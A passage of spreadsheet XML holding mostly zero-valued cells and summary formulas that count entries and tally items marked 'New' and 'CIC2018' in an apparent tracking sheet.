        <v>0</v>
      </c>
      <c r="HS112" s="108">
        <v>0</v>
      </c>
      <c r="HT112" s="109">
        <v>0</v>
      </c>
      <c r="HU112" s="110">
        <v>0</v>
      </c>
      <c r="HV112" s="501">
        <v>0</v>
      </c>
      <c r="HW112" s="111">
        <v>0</v>
      </c>
      <c r="HX112" s="111">
        <v>0</v>
      </c>
      <c r="HY112" s="112">
        <v>0</v>
      </c>
      <c r="HZ112" s="113">
        <v>0</v>
      </c>
      <c r="IA112" s="114">
        <v>0</v>
      </c>
      <c r="IB112" s="503">
        <v>0</v>
      </c>
      <c r="IC112" s="115">
        <v>0</v>
      </c>
      <c r="ID112" s="115">
        <v>0</v>
      </c>
      <c r="IE112" s="116">
        <v>0</v>
      </c>
      <c r="IF112" s="250">
        <v>0</v>
      </c>
      <c r="IG112" s="251">
        <v>0</v>
      </c>
      <c r="IH112" s="505">
        <v>0</v>
      </c>
      <c r="II112" s="252">
        <v>0</v>
      </c>
      <c r="IJ112" s="252">
        <v>0</v>
      </c>
      <c r="IK112" s="253">
        <v>0</v>
      </c>
      <c r="IL112" s="101">
        <v>0</v>
      </c>
      <c r="IM112" s="102">
        <v>0</v>
      </c>
      <c r="IN112" s="102">
        <v>0</v>
      </c>
      <c r="IO112" s="103">
        <v>0</v>
      </c>
      <c r="IP112" s="103">
        <v>0</v>
      </c>
      <c r="IQ112" s="104">
        <v>0</v>
      </c>
      <c r="IR112" s="105">
        <v>0</v>
      </c>
      <c r="IS112" s="106">
        <v>0</v>
      </c>
      <c r="IT112" s="497">
        <v>0</v>
      </c>
      <c r="IU112" s="107">
        <v>0</v>
      </c>
      <c r="IV112" s="107">
        <v>0</v>
      </c>
      <c r="IW112" s="108">
        <v>0</v>
      </c>
      <c r="IX112" s="109">
        <v>0</v>
      </c>
      <c r="IY112" s="110">
        <v>0</v>
      </c>
      <c r="IZ112" s="501">
        <v>0</v>
      </c>
      <c r="JA112" s="111">
        <v>0</v>
      </c>
      <c r="JB112" s="111">
        <v>0</v>
      </c>
      <c r="JC112" s="112">
        <v>0</v>
      </c>
      <c r="JD112" s="113">
        <v>0</v>
      </c>
      <c r="JE112" s="114">
        <v>0</v>
      </c>
      <c r="JF112" s="503">
        <v>0</v>
      </c>
      <c r="JG112" s="115">
        <v>0</v>
      </c>
      <c r="JH112" s="115">
        <v>0</v>
      </c>
      <c r="JI112" s="116">
        <v>0</v>
      </c>
      <c r="JJ112" s="101">
        <v>0</v>
      </c>
      <c r="JK112" s="102">
        <v>0</v>
      </c>
      <c r="JL112" s="102">
        <v>0</v>
      </c>
      <c r="JM112" s="103">
        <v>0</v>
      </c>
      <c r="JN112" s="103">
        <v>0</v>
      </c>
      <c r="JO112" s="104">
        <v>0</v>
      </c>
      <c r="JP112" s="105">
        <v>0</v>
      </c>
      <c r="JQ112" s="106">
        <v>0</v>
      </c>
      <c r="JR112" s="497">
        <v>0</v>
      </c>
      <c r="JS112" s="107">
        <v>0</v>
      </c>
      <c r="JT112" s="107">
        <v>0</v>
      </c>
      <c r="JU112" s="108">
        <v>0</v>
      </c>
      <c r="JV112" s="109">
        <v>0</v>
      </c>
      <c r="JW112" s="110">
        <v>0</v>
      </c>
      <c r="JX112" s="501">
        <v>0</v>
      </c>
      <c r="JY112" s="111">
        <v>0</v>
      </c>
      <c r="JZ112" s="111">
        <v>0</v>
      </c>
      <c r="KA112" s="112">
        <v>0</v>
      </c>
      <c r="KB112" s="113">
        <v>0</v>
      </c>
      <c r="KC112" s="114">
        <v>0</v>
      </c>
      <c r="KD112" s="503">
        <v>0</v>
      </c>
      <c r="KE112" s="115">
        <v>0</v>
      </c>
      <c r="KF112" s="115">
        <v>0</v>
      </c>
      <c r="KG112" s="116">
        <v>0</v>
      </c>
      <c r="KH112" s="250">
        <v>0</v>
      </c>
      <c r="KI112" s="251">
        <v>0</v>
      </c>
      <c r="KJ112" s="505">
        <v>0</v>
      </c>
      <c r="KK112" s="252">
        <v>0</v>
      </c>
      <c r="KL112" s="252">
        <v>0</v>
      </c>
      <c r="KM112" s="253">
        <v>0</v>
      </c>
      <c r="KN112" s="101">
        <v>0</v>
      </c>
      <c r="KO112" s="102">
        <v>0</v>
      </c>
      <c r="KP112" s="102">
        <v>0</v>
      </c>
      <c r="KQ112" s="103">
        <v>0</v>
      </c>
      <c r="KR112" s="103">
        <v>0</v>
      </c>
      <c r="KS112" s="104">
        <v>0</v>
      </c>
      <c r="KT112" s="105">
        <v>0</v>
      </c>
      <c r="KU112" s="106">
        <v>0</v>
      </c>
      <c r="KV112" s="497">
        <v>0</v>
      </c>
      <c r="KW112" s="107">
        <v>0</v>
      </c>
      <c r="KX112" s="107">
        <v>0</v>
      </c>
      <c r="KY112" s="108">
        <v>0</v>
      </c>
      <c r="KZ112" s="109">
        <v>0</v>
      </c>
      <c r="LA112" s="110">
        <v>0</v>
      </c>
      <c r="LB112" s="501">
        <v>0</v>
      </c>
      <c r="LC112" s="111">
        <v>0</v>
      </c>
      <c r="LD112" s="111">
        <v>0</v>
      </c>
      <c r="LE112" s="112">
        <v>0</v>
      </c>
      <c r="LF112" s="113">
        <v>0</v>
      </c>
      <c r="LG112" s="114">
        <v>0</v>
      </c>
      <c r="LH112" s="503">
        <v>0</v>
      </c>
      <c r="LI112" s="115">
        <v>0</v>
      </c>
      <c r="LJ112" s="115">
        <v>0</v>
      </c>
      <c r="LK112" s="116">
        <v>0</v>
      </c>
      <c r="LL112" s="117">
        <v>100</v>
      </c>
      <c r="LM112" s="507">
        <v>100</v>
      </c>
      <c r="LN112" s="119">
        <v>0</v>
      </c>
      <c r="LO112" s="119">
        <v>1</v>
      </c>
      <c r="LP112" s="119">
        <v>100</v>
      </c>
      <c r="LQ112" s="119">
        <v>0</v>
      </c>
      <c r="LR112" s="119">
        <v>100</v>
      </c>
      <c r="LS112" s="119">
        <v>100</v>
      </c>
      <c r="LT112" s="382"/>
      <c r="LU112" s="117">
        <v>0</v>
      </c>
      <c r="LV112" s="118">
        <v>0</v>
      </c>
      <c r="LW112" s="507">
        <v>0</v>
      </c>
      <c r="LX112" s="119">
        <v>0</v>
      </c>
      <c r="LY112" s="119">
        <v>0</v>
      </c>
      <c r="LZ112" s="119">
        <v>0</v>
      </c>
      <c r="MA112" s="117">
        <v>0</v>
      </c>
      <c r="MB112" s="118">
        <v>0</v>
      </c>
      <c r="MC112" s="507">
        <v>0</v>
      </c>
      <c r="MD112" s="119">
        <v>0</v>
      </c>
      <c r="ME112" s="119">
        <v>0</v>
      </c>
      <c r="MF112" s="119">
        <v>0</v>
      </c>
      <c r="MG112" s="117">
        <v>0</v>
      </c>
      <c r="MH112" s="118">
        <v>0</v>
      </c>
      <c r="MI112" s="507">
        <v>0</v>
      </c>
      <c r="MJ112" s="119">
        <v>0</v>
      </c>
      <c r="MK112" s="119">
        <v>0</v>
      </c>
      <c r="ML112" s="119">
        <v>0</v>
      </c>
      <c r="MM112" s="117">
        <v>0</v>
      </c>
      <c r="MN112" s="118">
        <v>0</v>
      </c>
      <c r="MO112" s="507">
        <v>0</v>
      </c>
      <c r="MP112" s="119">
        <v>0</v>
      </c>
      <c r="MQ112" s="119">
        <v>0</v>
      </c>
      <c r="MR112" s="119">
        <v>0</v>
      </c>
      <c r="MS112" s="117">
        <v>0</v>
      </c>
      <c r="MT112" s="118">
        <v>0</v>
      </c>
      <c r="MU112" s="507">
        <v>0</v>
      </c>
      <c r="MV112" s="119">
        <v>0</v>
      </c>
      <c r="MW112" s="119">
        <v>0</v>
      </c>
      <c r="MX112" s="119">
        <v>0</v>
      </c>
      <c r="MY112" s="117">
        <v>0</v>
      </c>
      <c r="MZ112" s="118">
        <v>0</v>
      </c>
      <c r="NA112" s="507">
        <v>0</v>
      </c>
      <c r="NB112" s="119">
        <v>0</v>
      </c>
      <c r="NC112" s="119">
        <v>0</v>
      </c>
      <c r="ND112" s="119">
        <v>0</v>
      </c>
      <c r="NE112" s="117">
        <v>0</v>
      </c>
      <c r="NF112" s="118">
        <v>0</v>
      </c>
      <c r="NG112" s="507">
        <v>0</v>
      </c>
      <c r="NH112" s="119">
        <v>0</v>
      </c>
      <c r="NI112" s="119">
        <v>0</v>
      </c>
      <c r="NJ112" s="119">
        <v>0</v>
      </c>
      <c r="NK112" s="117">
        <v>100</v>
      </c>
      <c r="NL112" s="118" t="s">
        <v>4438</v>
      </c>
      <c r="NM112" s="507">
        <v>100</v>
      </c>
      <c r="NN112" s="119" t="s">
        <v>3899</v>
      </c>
      <c r="NO112" s="119">
        <v>1</v>
      </c>
      <c r="NP112" s="119">
        <v>100</v>
      </c>
      <c r="NQ112" s="117">
        <v>0</v>
      </c>
      <c r="NR112" s="118">
        <v>0</v>
      </c>
      <c r="NS112" s="507">
        <v>0</v>
      </c>
      <c r="NT112" s="119">
        <v>0</v>
      </c>
      <c r="NU112" s="119">
        <v>0</v>
      </c>
      <c r="NV112" s="119">
        <v>0</v>
      </c>
      <c r="NW112" s="117">
        <v>0</v>
      </c>
      <c r="NX112" s="118">
        <v>0</v>
      </c>
      <c r="NY112" s="507">
        <v>0</v>
      </c>
      <c r="NZ112" s="119">
        <v>0</v>
      </c>
      <c r="OA112" s="119">
        <v>0</v>
      </c>
      <c r="OB112" s="119">
        <v>0</v>
      </c>
      <c r="OC112" s="120">
        <v>0</v>
      </c>
      <c r="OD112" s="120">
        <v>0</v>
      </c>
      <c r="OE112" s="120">
        <v>0</v>
      </c>
      <c r="OF112" s="121">
        <v>0</v>
      </c>
      <c r="OG112" s="120">
        <v>0</v>
      </c>
      <c r="OH112" s="120">
        <v>0</v>
      </c>
      <c r="OI112" s="120">
        <v>0</v>
      </c>
      <c r="OJ112" s="120">
        <v>0</v>
      </c>
      <c r="OK112" s="383"/>
      <c r="OL112" s="120">
        <v>0</v>
      </c>
      <c r="OM112" s="120">
        <v>0</v>
      </c>
      <c r="ON112" s="120">
        <v>0</v>
      </c>
      <c r="OO112" s="120"/>
      <c r="OP112" s="120">
        <v>0</v>
      </c>
      <c r="OQ112" s="464">
        <v>0</v>
      </c>
      <c r="OR112" s="120">
        <v>0</v>
      </c>
      <c r="OS112" s="120">
        <v>0</v>
      </c>
      <c r="OT112" s="120">
        <v>0</v>
      </c>
      <c r="OU112" s="120"/>
      <c r="OV112" s="120">
        <v>0</v>
      </c>
      <c r="OW112" s="464">
        <v>0</v>
      </c>
      <c r="OX112" s="120">
        <v>0</v>
      </c>
      <c r="OY112" s="120">
        <v>0</v>
      </c>
      <c r="OZ112" s="120">
        <v>0</v>
      </c>
      <c r="PA112" s="120"/>
      <c r="PB112" s="120">
        <v>0</v>
      </c>
      <c r="PC112" s="464">
        <v>0</v>
      </c>
      <c r="PD112" s="120">
        <v>0</v>
      </c>
      <c r="PE112" s="120">
        <v>0</v>
      </c>
      <c r="PF112" s="120">
        <v>0</v>
      </c>
      <c r="PG112" s="120"/>
      <c r="PH112" s="120">
        <v>0</v>
      </c>
      <c r="PI112" s="464">
        <v>0</v>
      </c>
      <c r="PJ112" s="120">
        <v>0</v>
      </c>
      <c r="PK112" s="120">
        <v>0</v>
      </c>
      <c r="PL112" s="120">
        <v>0</v>
      </c>
      <c r="PM112" s="120"/>
      <c r="PN112" s="120">
        <v>0</v>
      </c>
      <c r="PO112" s="464">
        <v>0</v>
      </c>
      <c r="PP112" s="120">
        <v>0</v>
      </c>
      <c r="PQ112" s="120">
        <v>0</v>
      </c>
      <c r="PR112" s="120">
        <v>0</v>
      </c>
      <c r="PS112" s="120"/>
      <c r="PT112" s="120">
        <v>0</v>
      </c>
      <c r="PU112" s="464">
        <v>0</v>
      </c>
      <c r="PV112" s="120">
        <v>0</v>
      </c>
      <c r="PW112" s="120">
        <v>0</v>
      </c>
      <c r="PX112" s="120">
        <v>0</v>
      </c>
      <c r="PY112" s="120"/>
      <c r="PZ112" s="120">
        <v>0</v>
      </c>
      <c r="QA112" s="464">
        <v>0</v>
      </c>
      <c r="QB112" s="120">
        <v>0</v>
      </c>
      <c r="QC112" s="120">
        <v>0</v>
      </c>
      <c r="QD112" s="120">
        <v>0</v>
      </c>
      <c r="QE112" s="120"/>
      <c r="QF112" s="120">
        <v>0</v>
      </c>
      <c r="QG112" s="464">
        <v>0</v>
      </c>
      <c r="QH112" s="120">
        <v>0</v>
      </c>
      <c r="QI112" s="120">
        <v>0</v>
      </c>
      <c r="QJ112" s="120">
        <v>0</v>
      </c>
      <c r="QK112" s="120"/>
      <c r="QL112" s="120">
        <v>0</v>
      </c>
      <c r="QM112" s="464">
        <v>0</v>
      </c>
      <c r="QN112" s="120">
        <v>0</v>
      </c>
      <c r="QO112" s="120">
        <v>0</v>
      </c>
      <c r="QP112" s="120">
        <v>0</v>
      </c>
      <c r="QQ112" s="120"/>
      <c r="QR112" s="120">
        <v>0</v>
      </c>
      <c r="QS112" s="464">
        <v>0</v>
      </c>
      <c r="QT112" s="184"/>
      <c r="QU112" s="184"/>
      <c r="QV112" s="184"/>
      <c r="QW112" s="184"/>
      <c r="QX112" s="184"/>
      <c r="QY112" s="184"/>
      <c r="QZ112" s="184"/>
      <c r="RA112" s="184"/>
      <c r="RB112" s="184"/>
      <c r="RC112" s="184"/>
      <c r="RD112" s="184"/>
      <c r="RE112" s="184"/>
      <c r="RF112" s="184"/>
      <c r="RG112" s="184"/>
      <c r="RH112" s="184"/>
      <c r="RI112" s="184"/>
      <c r="RJ112" s="184"/>
      <c r="RK112" s="184"/>
      <c r="RL112" s="184"/>
      <c r="RM112" s="184"/>
      <c r="RN112" s="184"/>
      <c r="RO112" s="184"/>
      <c r="RP112" s="184"/>
      <c r="RQ112" s="184"/>
      <c r="RR112" s="184"/>
      <c r="RS112" s="184"/>
      <c r="RT112" s="184"/>
      <c r="RU112" s="184"/>
      <c r="RV112" s="184"/>
      <c r="RW112" s="184"/>
      <c r="RX112" s="184"/>
      <c r="RY112" s="184"/>
      <c r="RZ112" s="184"/>
      <c r="SA112" s="184"/>
      <c r="SB112" s="184"/>
      <c r="SC112" s="184"/>
      <c r="SD112" s="184"/>
      <c r="SE112" s="184"/>
      <c r="SF112" s="184"/>
      <c r="SG112" s="184"/>
      <c r="SH112" s="184"/>
      <c r="SI112" s="184"/>
      <c r="SJ112" s="184"/>
      <c r="SK112" s="184"/>
      <c r="SL112" s="184"/>
      <c r="SM112" s="184"/>
      <c r="SN112" s="184"/>
      <c r="SO112" s="184"/>
      <c r="SP112" s="184"/>
      <c r="SQ112" s="184"/>
      <c r="SR112" s="184"/>
      <c r="SS112" s="184"/>
      <c r="ST112" s="184"/>
      <c r="SU112" s="184"/>
      <c r="SV112" s="184"/>
      <c r="SW112" s="184"/>
      <c r="SX112" s="184"/>
      <c r="SY112" s="184"/>
      <c r="SZ112" s="184"/>
      <c r="TA112" s="184"/>
      <c r="TB112" s="184"/>
      <c r="TC112" s="184"/>
      <c r="TD112" s="184"/>
      <c r="TE112" s="184"/>
      <c r="TF112" s="184"/>
      <c r="TG112" s="184"/>
      <c r="TH112" s="184"/>
      <c r="TI112" s="184"/>
      <c r="TJ112" s="184"/>
      <c r="TK112" s="184"/>
      <c r="TL112" s="184"/>
      <c r="TM112" s="184"/>
      <c r="TN112" s="184"/>
      <c r="TO112" s="184"/>
      <c r="TP112" s="184"/>
      <c r="TQ112" s="184"/>
      <c r="TR112" s="184"/>
      <c r="TS112" s="184"/>
      <c r="TT112" s="184"/>
      <c r="TU112" s="184"/>
      <c r="TV112" s="184"/>
      <c r="TW112" s="184"/>
      <c r="TX112" s="184"/>
      <c r="TY112" s="184"/>
      <c r="TZ112" s="184"/>
      <c r="UA112" s="184"/>
      <c r="UB112" s="184"/>
      <c r="UC112" s="184"/>
      <c r="UD112" s="184"/>
      <c r="UE112" s="184"/>
      <c r="UF112" s="184"/>
      <c r="UG112" s="184"/>
      <c r="UH112" s="184"/>
      <c r="UI112" s="184"/>
      <c r="UJ112" s="184"/>
      <c r="UK112" s="184"/>
      <c r="UL112" s="184"/>
      <c r="UM112" s="184"/>
      <c r="UN112" s="184"/>
      <c r="UO112" s="184"/>
      <c r="UP112" s="184"/>
      <c r="UQ112" s="184"/>
      <c r="UR112" s="184"/>
      <c r="US112" s="184"/>
      <c r="UT112" s="184"/>
      <c r="UU112" s="184"/>
      <c r="UV112" s="184"/>
      <c r="UW112" s="184"/>
      <c r="UX112" s="184"/>
      <c r="UY112" s="184"/>
      <c r="UZ112" s="184"/>
      <c r="VA112" s="184"/>
      <c r="VB112" s="184"/>
      <c r="VC112" s="184"/>
      <c r="VD112" s="184"/>
      <c r="VE112" s="184"/>
      <c r="VF112" s="184"/>
      <c r="VG112" s="184"/>
      <c r="VH112" s="184"/>
      <c r="VI112" s="184"/>
      <c r="VJ112" s="184"/>
      <c r="VK112" s="184"/>
      <c r="VL112" s="184"/>
      <c r="VM112" s="184"/>
      <c r="VN112" s="184"/>
      <c r="VO112" s="184"/>
      <c r="VP112" s="184"/>
      <c r="VQ112" s="184"/>
      <c r="VR112" s="184"/>
      <c r="VS112" s="184"/>
      <c r="VT112" s="184"/>
      <c r="VU112" s="184"/>
      <c r="VV112" s="184"/>
      <c r="VW112" s="184"/>
      <c r="VX112" s="184"/>
      <c r="VY112" s="184"/>
    </row>
    <row r="113" spans="1:615" s="214" customFormat="1" ht="57.75" customHeight="1" thickTop="1" thickBot="1">
      <c r="A113" s="209" t="s">
        <v>1755</v>
      </c>
      <c r="B113" s="210">
        <f>COUNTIF(A3:A112,"&lt;&gt;")</f>
        <v>110</v>
      </c>
      <c r="C113" s="209" t="s">
        <v>1756</v>
      </c>
      <c r="D113" s="211">
        <f>COUNTIF(L3:L112,"*C2018*")</f>
        <v>13</v>
      </c>
      <c r="E113" s="209" t="s">
        <v>1757</v>
      </c>
      <c r="F113" s="211">
        <f>COUNTIF(L3:L112,"&lt;&gt;*C2018*")</f>
        <v>97</v>
      </c>
      <c r="G113" s="209" t="s">
        <v>4142</v>
      </c>
      <c r="H113" s="211">
        <f>SUMPRODUCT((F3:F112&lt;&gt;"-")*(F3:F112&lt;&gt;"")/COUNTIF(F3:F112,F3:F112&amp;""))</f>
        <v>76.000000000000014</v>
      </c>
      <c r="I113" s="209" t="s">
        <v>4143</v>
      </c>
      <c r="J113" s="211">
        <f>SUMPRODUCT((H3:H112&lt;&gt;"-")*(H3:H112&lt;&gt;"")/COUNTIF(H3:H112,H3:H112&amp;""))</f>
        <v>42.999999999999986</v>
      </c>
      <c r="K113" s="211"/>
      <c r="L113" s="211"/>
      <c r="M113" s="241" t="s">
        <v>1719</v>
      </c>
      <c r="N113" s="242"/>
      <c r="O113" s="489" t="s">
        <v>2494</v>
      </c>
      <c r="P113" s="490">
        <f>COUNTIF(O3:O112,"New")</f>
        <v>97</v>
      </c>
      <c r="Q113" s="216"/>
      <c r="R113" s="215"/>
      <c r="V113" s="216"/>
      <c r="W113" s="215"/>
      <c r="AA113" s="212">
        <f t="array" aca="1" ref="AA113" ca="1">SUM(IF((AA3:AA116="SI")*($F$3:$F$116&lt;&gt;""),1/COUNTIFS($F$3:$F$116,$F$3:$F$116,AA3:AA116,"SI")))</f>
        <v>74</v>
      </c>
      <c r="AB113" s="213">
        <f t="array" aca="1" ref="AB113" ca="1">SUM(IF((AB3:AB116="SI")*($F$3:$F$116&lt;&gt;""),1/COUNTIFS($F$3:$F$116,$F$3:$F$116,AB3:AB116,"SI")))</f>
        <v>75</v>
      </c>
      <c r="AC113" s="213">
        <f t="array" ref="AC113">SUM(IF((AC3:AC112="SI")*($F$3:$F$112&lt;&gt;""),1/COUNTIFS($F$3:$F$112,$F$3:$F$112,AC3:AC112,"SI")))</f>
        <v>76.000000000000014</v>
      </c>
      <c r="AD113" s="213">
        <f t="array" aca="1" ref="AD113" ca="1">SUM(IF((AD3:AD116="SI")*($H$3:$H$116&lt;&gt;""),1/COUNTIFS($H$3:$H$116,$H$3:$H$116,AD3:AD116,"SI")))</f>
        <v>0</v>
      </c>
      <c r="AE113" s="213">
        <f t="array" aca="1" ref="AE113" ca="1">SUM(IF((AE3:AE116="SI")*($H$3:$H$116&lt;&gt;""),1/COUNTIFS($H$3:$H$116,$H$3:$H$116,AE3:AE116,"SI")))</f>
        <v>0</v>
      </c>
      <c r="AF113" s="213">
        <f t="array" ref="AF113">SUM(IF((AF3:AF112="SI")*($H$3:$H$112&lt;&gt;""),1/COUNTIFS($H$3:$H$112,$H$3:$H$112,AF3:AF112,"SI")))</f>
        <v>43.999999999999986</v>
      </c>
      <c r="AK113" s="240" t="s">
        <v>1720</v>
      </c>
      <c r="AN113" s="790" t="s">
        <v>2482</v>
      </c>
      <c r="AO113" s="791"/>
      <c r="AP113" s="473">
        <f>COUNTIFS($AP$3:$AP$112,"&lt;&gt;SI",$AP$3:$AP$112,"&lt;&gt;NO",$AP$3:$AP$112,"&lt;&gt;")</f>
        <v>35</v>
      </c>
      <c r="AQ113" s="790" t="s">
        <v>2483</v>
      </c>
      <c r="AR113" s="791"/>
      <c r="AS113" s="473">
        <f>COUNTIF($AP$3:$AP$112,"NO")</f>
        <v>0</v>
      </c>
      <c r="AT113" s="790" t="s">
        <v>2484</v>
      </c>
      <c r="AU113" s="791"/>
      <c r="AV113" s="473">
        <f>COUNTIF($AP$3:$AP$112,"SI")</f>
        <v>75</v>
      </c>
      <c r="AW113" s="790" t="s">
        <v>2485</v>
      </c>
      <c r="AX113" s="791"/>
      <c r="AY113" s="473">
        <f>SUM(AP113,AS113,AV113)</f>
        <v>110</v>
      </c>
      <c r="BA113" s="216"/>
      <c r="BB113" s="393" t="s">
        <v>1721</v>
      </c>
      <c r="BC113" s="393"/>
      <c r="BD113" s="749" t="s">
        <v>4134</v>
      </c>
      <c r="BE113" s="749"/>
      <c r="BF113" s="749"/>
      <c r="BG113" s="749"/>
      <c r="BL113" s="393"/>
      <c r="BS113" s="393"/>
      <c r="BW113" s="215"/>
      <c r="BX113" s="215"/>
      <c r="BY113" s="215"/>
      <c r="CA113" s="393"/>
      <c r="CB113" s="393"/>
      <c r="CE113" s="215"/>
      <c r="CF113" s="215"/>
      <c r="CG113" s="215"/>
      <c r="CH113" s="215"/>
      <c r="CJ113" s="393"/>
      <c r="CL113" s="215"/>
      <c r="CM113" s="215"/>
      <c r="CN113" s="215"/>
      <c r="CO113" s="215"/>
      <c r="CP113" s="215"/>
      <c r="CQ113" s="393"/>
      <c r="CY113" s="393"/>
      <c r="CZ113" s="393"/>
      <c r="DD113" s="393" t="s">
        <v>1721</v>
      </c>
      <c r="DE113" s="393"/>
      <c r="DF113" s="393"/>
      <c r="DN113" s="393"/>
      <c r="DU113" s="393"/>
      <c r="DY113" s="215"/>
      <c r="DZ113" s="215"/>
      <c r="EA113" s="215"/>
      <c r="EC113" s="393"/>
      <c r="ED113" s="393"/>
      <c r="EG113" s="215"/>
      <c r="EH113" s="215"/>
      <c r="EI113" s="215"/>
      <c r="EJ113" s="215"/>
      <c r="EL113" s="393"/>
      <c r="EN113" s="215"/>
      <c r="EO113" s="215"/>
      <c r="EP113" s="215"/>
      <c r="EQ113" s="215"/>
      <c r="ER113" s="215"/>
      <c r="ES113" s="393"/>
      <c r="FA113" s="393"/>
      <c r="FB113" s="393"/>
      <c r="FF113" s="393" t="s">
        <v>1721</v>
      </c>
      <c r="FG113" s="393"/>
      <c r="FH113" s="393"/>
      <c r="FP113" s="393"/>
      <c r="FW113" s="393"/>
      <c r="GA113" s="215"/>
      <c r="GB113" s="215"/>
      <c r="GC113" s="215"/>
      <c r="GE113" s="393"/>
      <c r="GF113" s="393"/>
      <c r="GI113" s="215"/>
      <c r="GJ113" s="215"/>
      <c r="GK113" s="215"/>
      <c r="GL113" s="215"/>
      <c r="GN113" s="393"/>
      <c r="GP113" s="215"/>
      <c r="GQ113" s="215"/>
      <c r="GR113" s="215"/>
      <c r="GS113" s="215"/>
      <c r="GT113" s="215"/>
      <c r="GU113" s="393"/>
      <c r="HC113" s="393"/>
      <c r="HD113" s="393"/>
      <c r="HH113" s="393" t="s">
        <v>1721</v>
      </c>
      <c r="HI113" s="393"/>
      <c r="HJ113" s="393"/>
      <c r="HR113" s="393"/>
      <c r="HY113" s="393"/>
      <c r="IC113" s="215"/>
      <c r="ID113" s="215"/>
      <c r="IE113" s="215"/>
      <c r="IG113" s="393"/>
      <c r="IH113" s="393"/>
      <c r="IK113" s="215"/>
      <c r="IL113" s="215"/>
      <c r="IM113" s="215"/>
      <c r="IN113" s="215"/>
      <c r="IP113" s="393"/>
      <c r="IR113" s="215"/>
      <c r="IS113" s="215"/>
      <c r="IT113" s="215"/>
      <c r="IU113" s="215"/>
      <c r="IV113" s="215"/>
      <c r="IW113" s="393"/>
      <c r="JE113" s="393"/>
      <c r="JF113" s="393"/>
      <c r="JJ113" s="393" t="s">
        <v>1721</v>
      </c>
      <c r="JK113" s="393"/>
      <c r="JL113" s="393"/>
      <c r="JT113" s="393"/>
      <c r="KA113" s="393"/>
      <c r="KE113" s="215"/>
      <c r="KF113" s="215"/>
      <c r="KG113" s="215"/>
      <c r="KI113" s="393"/>
      <c r="KJ113" s="393"/>
      <c r="KM113" s="215"/>
      <c r="KN113" s="215"/>
      <c r="KO113" s="215"/>
      <c r="KP113" s="215"/>
      <c r="KR113" s="393"/>
      <c r="KT113" s="215"/>
      <c r="KU113" s="215"/>
      <c r="KV113" s="215"/>
      <c r="KW113" s="215"/>
      <c r="KX113" s="215"/>
      <c r="KY113" s="393"/>
      <c r="LG113" s="393"/>
      <c r="LH113" s="393"/>
      <c r="LO113" s="215"/>
      <c r="LP113" s="215"/>
      <c r="LQ113" s="215"/>
      <c r="LR113" s="215"/>
      <c r="LT113" s="387"/>
      <c r="LX113" s="393"/>
      <c r="LY113" s="393"/>
      <c r="LZ113" s="215"/>
      <c r="MD113" s="393"/>
      <c r="ME113" s="393"/>
      <c r="MF113" s="215"/>
      <c r="MJ113" s="393"/>
      <c r="MK113" s="393"/>
      <c r="ML113" s="215"/>
      <c r="MP113" s="393"/>
      <c r="MQ113" s="393"/>
      <c r="MR113" s="215"/>
      <c r="MV113" s="393"/>
      <c r="MW113" s="393"/>
      <c r="MX113" s="215"/>
      <c r="NB113" s="393"/>
      <c r="NC113" s="393"/>
      <c r="ND113" s="215"/>
      <c r="NH113" s="393"/>
      <c r="NI113" s="393"/>
      <c r="NJ113" s="215"/>
      <c r="NN113" s="393"/>
      <c r="NO113" s="393"/>
      <c r="NP113" s="215"/>
      <c r="NT113" s="393"/>
      <c r="NU113" s="393"/>
      <c r="NV113" s="215"/>
      <c r="NZ113" s="393"/>
      <c r="OA113" s="393"/>
      <c r="OB113" s="215"/>
      <c r="OE113" s="215"/>
      <c r="OG113" s="393"/>
      <c r="OH113" s="393"/>
      <c r="OK113" s="216"/>
      <c r="OO113" s="215"/>
      <c r="OP113" s="215"/>
      <c r="OQ113" s="393"/>
      <c r="OU113" s="215"/>
      <c r="OV113" s="215"/>
      <c r="OW113" s="393"/>
      <c r="PA113" s="215"/>
      <c r="PB113" s="215"/>
      <c r="PC113" s="393"/>
      <c r="PG113" s="215"/>
      <c r="PH113" s="215"/>
      <c r="PI113" s="393"/>
      <c r="PM113" s="215"/>
      <c r="PN113" s="215"/>
      <c r="PO113" s="393"/>
      <c r="PS113" s="215"/>
      <c r="PT113" s="215"/>
      <c r="PU113" s="393"/>
      <c r="PY113" s="215"/>
      <c r="PZ113" s="215"/>
      <c r="QA113" s="393"/>
      <c r="QE113" s="215"/>
      <c r="QF113" s="215"/>
      <c r="QG113" s="393"/>
      <c r="QK113" s="215"/>
      <c r="QL113" s="215"/>
      <c r="QM113" s="393"/>
      <c r="QQ113" s="215"/>
      <c r="QR113" s="215"/>
      <c r="QS113" s="393"/>
      <c r="RA113" s="393"/>
      <c r="RB113" s="393"/>
    </row>
    <row r="114" spans="1:615" ht="43.5" thickBot="1">
      <c r="O114" s="491" t="s">
        <v>2495</v>
      </c>
      <c r="P114" s="492">
        <f>COUNTIF(O3:O112,"CIC2018")</f>
        <v>13</v>
      </c>
      <c r="Q114" s="388"/>
      <c r="R114" s="217"/>
      <c r="S114" s="217"/>
      <c r="T114" s="217"/>
      <c r="U114" s="217"/>
      <c r="V114" s="217"/>
      <c r="W114" s="217"/>
      <c r="X114" s="217"/>
      <c r="Y114" s="217"/>
      <c r="Z114" s="217"/>
      <c r="AI114" s="217"/>
      <c r="AJ114" s="217"/>
      <c r="AK114" s="240"/>
      <c r="AL114" s="217"/>
      <c r="AM114" s="217"/>
      <c r="AN114" s="217"/>
      <c r="AO114" s="217"/>
      <c r="AP114" s="217"/>
      <c r="AQ114" s="217"/>
      <c r="AR114" s="217"/>
      <c r="AS114" s="217"/>
      <c r="AT114" s="217"/>
      <c r="AU114" s="217"/>
      <c r="AV114" s="217"/>
      <c r="AW114" s="217"/>
      <c r="AX114" s="217"/>
      <c r="AY114" s="217"/>
      <c r="AZ114" s="217"/>
      <c r="BA114" s="388"/>
      <c r="BB114" s="393"/>
      <c r="BC114" s="393"/>
      <c r="BD114" s="393"/>
      <c r="BL114" s="393"/>
      <c r="BS114" s="393"/>
      <c r="BW114" s="2"/>
      <c r="BX114" s="2"/>
      <c r="BY114" s="2"/>
      <c r="CA114" s="393"/>
      <c r="CB114" s="393"/>
      <c r="CE114" s="2"/>
      <c r="CF114" s="2"/>
      <c r="CG114" s="2"/>
      <c r="CH114" s="2"/>
      <c r="CJ114" s="393"/>
      <c r="CL114" s="2"/>
      <c r="CM114" s="2"/>
      <c r="CN114" s="2"/>
      <c r="CO114" s="2"/>
      <c r="CP114" s="2"/>
      <c r="CQ114" s="393"/>
      <c r="CY114" s="393"/>
      <c r="CZ114" s="393"/>
      <c r="DD114" s="393"/>
      <c r="DE114" s="393"/>
      <c r="DF114" s="393"/>
